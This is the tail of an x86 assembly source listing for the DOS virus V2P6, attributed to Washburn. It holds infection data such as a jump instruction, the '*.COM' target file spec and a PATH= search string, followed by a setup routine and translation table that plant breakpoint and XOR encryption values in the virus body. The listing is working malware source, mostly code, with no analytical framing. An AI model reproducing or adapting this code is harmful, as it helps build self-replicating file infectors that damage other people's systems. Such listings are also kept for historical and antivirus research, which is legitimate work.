NEW_JUMP_INSTRUCTION:
|
||
DB 0E9H, 00, 00
|
||
|
||
FILE_SPEC:
|
||
DB "*.COM", 00
|
||
|
||
OFFSET_OF_PATH:
|
||
DB "PATH="
|
||
|
||
WORK_AREA:
|
||
DB 64 DUP (0)
|
||
|
||
NEW_DTA:
|
||
DB 30 DUP (0)
|
||
|
||
TARGET_FILE_NAME:
|
||
DB 13 DUP (0)
|
||
|
||
;============ THE FOLLOWING IS NOT PART OF THE VIRUS =============
|
||
; Needed to insert initial random encryption values, etc. for the
|
||
; first time. Values used here may correspond to Washburn's original
|
||
; values. They were obtained from a sample of V2P6 which might have
|
||
; been an original compilation of the virus by its author.
|
||
|
||
INSERT_ENCRYPTION_TECHNIQUES:
|
||
XOR BP,BP
|
||
MOV BX,OFFSET TRANS_TABLE
|
||
MOV SI,OFFSET START
|
||
MOV DI,OFFSET REAL_NOPS
|
||
MOV DX,OFFSET REAL_NOP
|
||
INC DI
|
||
ADD DX,3
|
||
|
||
SEARCH_FOR_NOPS:
|
||
INC SI
|
||
CMP SI,OFFSET EXIT
|
||
JE ANOTHER_RET
|
||
CMP SI,DI
|
||
JE LEAVE_IN
|
||
CMP SI,DX
|
||
JE LEAVE_IN
|
||
CMP WORD PTR[SI],09090H
|
||
JNE SEARCH_FOR_NOPS
|
||
CALL INSERT_BREAKPOINT_AND_XORING_VALUE
|
||
LEAVE_IN:
|
||
JMP SHORT SEARCH_FOR_NOPS
|
||
|
||
INSERT_BREAKPOINT_AND_XORING_VALUE:
|
||
MOV BYTE PTR[SI],0CCH
|
||
MOV AX,BP
|
||
XLATB
|
||
MOV BYTE PTR[SI+1],AL
|
||
XOR BYTE PTR[SI+2],AL
|
||
INC BP
|
||
ANOTHER_RET:
|
||
RET
|
||
|
||
TRANS_TABLE:
|
||
DB 08BH, 060H, 0D4H, 0C6H, 048H, 057H, 016H, 06EH
|
||
DB 0D3H, 087H, 080H, 000H, 090H, 07EH, 051H, 056H
|
||
DB 056H, 0F6H, 062H, 074H, 072H, 072H, 032H, 00AH
|
||
DB 0AFH, 03BH, 0AAH, 0BBH, 0FAH, 041H, 038H, 009H
|
||
DB 02FH, 0ABH, 0DCH, 0E5H, 004H, 010H, 08EH, 01FH
|
||
DB 00DH, 04FH, 0F7H, 002H, 0F0H, 002H, 050H, 036H
|
||
DB 04AH, 037H, 04AH, 077H, 0B2H, 07AH, 0B1H, 07AH
|
||
DB 031H
|
||
|
||
O10H EQU 010H
|
||
O3CH EQU 03CH
|
||
ODH EQU 0DH
|
||
OFH EQU 0FH
|
||
O1BH EQU 01BH
|
||
O6 EQU 06
|
||
O1AH EQU 01AH
|
||
O4 EQU 04
|
||
O7 EQU 07
|
||
O5CH EQU 05CH
|
||
O24H EQU 024H
|
||
O6AH EQU 06AH
|
||
O1 EQU 01
|
||
O2CH EQU 02CH
|
||
OO10H EQU 0010H
|
||
O22H EQU 022H
|
||
O27H EQU 027H
|
||
ZERO EQU 0
|
||
|
||
|
||
V2P6 ENDP
|
||
CODE_SEG ENDS
|
||
END V2P6
|
||
|